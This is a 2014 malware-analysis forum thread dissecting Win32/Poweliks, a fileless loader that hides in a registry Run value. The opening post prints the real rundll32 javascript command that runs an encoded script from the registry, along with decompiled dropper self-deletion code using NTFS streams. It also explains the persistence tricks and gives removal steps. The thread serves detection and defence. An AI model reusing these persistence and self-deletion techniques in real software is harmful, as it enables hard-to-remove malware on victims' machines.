Win32/Poweliks

Forum for analysis and discussion about malware.

Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 10:44 am

Some non typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT.

The key features of it, making it non typical:

1) This malware lives in registry value.
2) Non typical dropper self-deletion method, nothing zero day though.
3) Malware startup location protection in a backdoor Sirefef way.
4) It downloads, installs and uses Windows KB968930 (MS PowerShell).

More details below

1) This malware stored under key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and it autostart location is invisible to regedit, why explained in part 3.

img1.png


That's what really here.

img2.png


"Unnamed" value is a forged registry value that holds command to execute malware script stored in "Default" value. Exactly this value makes regedit crazy.

Autostart malware script below.

Code: Select all
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")


It purpose - read, encode and execute script stored in the "Default" value. The decoded malware now set as process environment variable named "a" and contains additional code to execute stored again as script code, lets call it ScriptA. It is named ScriptA.txt in attached archive. Decoded script attached as ScriptB.txt. As you can see they multiple times use base64 encoding for layered payload. Inside ScriptB you can find another base64 encoded which is attached as PayloadA.txt. This is base64 encoded dll which is actual malware designed to be running inside zombified copy of dllhost.exe (this malware aware about WOW64 and will select appropriate version of this executable - Wow64DisableWow64FsRedirection %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). Final payload dll (attached as payload.dll) packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpack of UPX.

This dll is simple and is capable of downloading and executing arbitrary files on infected machine (WinExec). Also because it is used in startup process this dll is also responsible for zombifying dllhost.exe process and self-injection through NtQueueApcThread.

2) It uses NTFS ADS for dropper self-deletion and more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if first method failed. After self-deletion malware persist on infected computer only in the zombified processes VA and in the registry.

First dropper attaches itself as stream to dropper. e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is a NTFS data stream copy of malware.exe. Next it spawns process from ADS and calls DeleteFile.

Yeah I too can F5 in HexRays.
Code: Select all
signed int __stdcall sub_401696(LPCSTR lpExistingFileName)
{
  char *NewFileName;
  struct _STARTUPINFOA StartupInfo;
  struct _PROCESS_INFORMATION ProcessInformation;

  snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName);
  if ( CopyFileA(lpExistingFileName, &NewFileName, 0) )
  {
    StartupInfo.cb = 68;
    memset(&StartupInfo.lpReserved, 0, 0x40u);
    if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) )
    {
      CloseHandle(ProcessInformation.hThread);
      CloseHandle(ProcessInformation.hProcess);
      return 1;
    }
    DeleteFileA(&NewFileName);
  }
  else
  {
    if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) )
      return 1;
  }
  return 0;
}


3) Embedded nulls used for protecting startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run key from removal and for hiding actual run value (regedit cannot handle incorrect value name and cancels listing items).

Malware payload dll inside dllhost zombie process additionally works as a watchdog and will recover malware startup registry values if they are removed.


Detection and Removal instructions:

This malware can be easily revealed because of invasive self-protection it uses. Autoruns and ProcessExplorer from sysinternals all you need to detect presense of this malware.

Locate and terminate dllhost.exe running without parents (it is launched by powershell that after exists).
regdelnull hkcu -s to remove forged Run subkey.
Regedit - delete whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.


Sample courtesy of R136a1
https://twitter.com/MalwareChannel/stat ... 6885412864

Also thanks to B-boy/StyLe/ who bring attention to this malware.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 3889
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 472

Re: Win32/Poweliks

Postby B-boy/StyLe/ » Tue Jul 15, 2014 11:14 am

Thanks for the detailed analysis. :)

Btw credits goes to aharonov and Picasso as well. We worked together on the latest variant which hijack HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} instead of HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

Regards,
Georgi
You do not have the required permissions to view the files attached to this post.
User avatar
B-boy/StyLe/
 
Posts: 49
Joined: Mon Mar 22, 2010 2:43 am
Reputation point: 12

Re: Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 11:18 am

I assume malware authors will intensively move startup locations and payload script encoding :)
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 3889
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 472

Re: Win32/Poweliks

Postby elise025 » Tue Jul 15, 2014 12:47 pm

Thanks for the great write up. Does anyone know how this is spread. I've been able to find droppers, but zero info about distribution unfortunately.
Some info available here: http://malware.dontneedcoffee.com/2014/ ... otnet.html
elise025
 
Posts: 1
Joined: Wed Dec 21, 2011 8:50 am
Reputation point: 0

Re: Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 2:32 pm

Exactly this binary was a payload of CVE-2012-0158 exploited RTF document.

Just a quick addition to first post - I completely forgot to add original encoded data.
It is encoded with Windows Script Encoder data from Run "Default" value. In attach original + fully decoded.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 3889
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 472

Re: Win32/Poweliks

Postby TwinHeadedEagle » Tue Jul 15, 2014 2:56 pm

I am hoping I will have some case these days, although it doesn't seem too complex. I cannot find, what this malware actually does?
TwinHeadedEagle
 
Posts: 71
Joined: Mon Aug 27, 2012 6:59 am
Reputation point: 5

Re: Win32/Poweliks

Postby EP_X0FF » Tue Jul 15, 2014 3:03 pm

MAXS wrote:I am hoping I will have some case these days, although it doesn't seem too complex. I cannot find, what this malware actually does?


This is loader type of malware.

It is capable download and execute arbitrary files on the infected computer (assume it is sort of "tasks" in their C&C panel). Additionally it send to malware urls installation feedback information.
You can assume if the computer infected with this - it will be full of other malware running together.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 3889
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 472

Re: Win32/Poweliks

Postby TwinHeadedEagle » Tue Jul 15, 2014 3:05 pm

Yes, I can imagine probably a bunch of Adware along with this malware :lol:

Thanks for the info.
TwinHeadedEagle
 
Posts: 71
Joined: Mon Aug 27, 2012 6:59 am
Reputation point: 5

Re: Win32/Poweliks

Postby rkhunter » Thu Jul 31, 2014 4:01 pm

Poweliks: the persistent malware without a file

https://blog.gdatasoftware.com/blog/art ... -file.html
User avatar
rkhunter
 
Posts: 1102
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 146

Re: Win32/Poweliks

Postby TwinHeadedEagle » Sun Aug 03, 2014 1:50 pm

Does someone have these hashes?

4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa

Or this one?

BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A
TwinHeadedEagle
 
Posts: 71
Joined: Mon Aug 27, 2012 6:59 am
Reputation point: 5

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 8 guests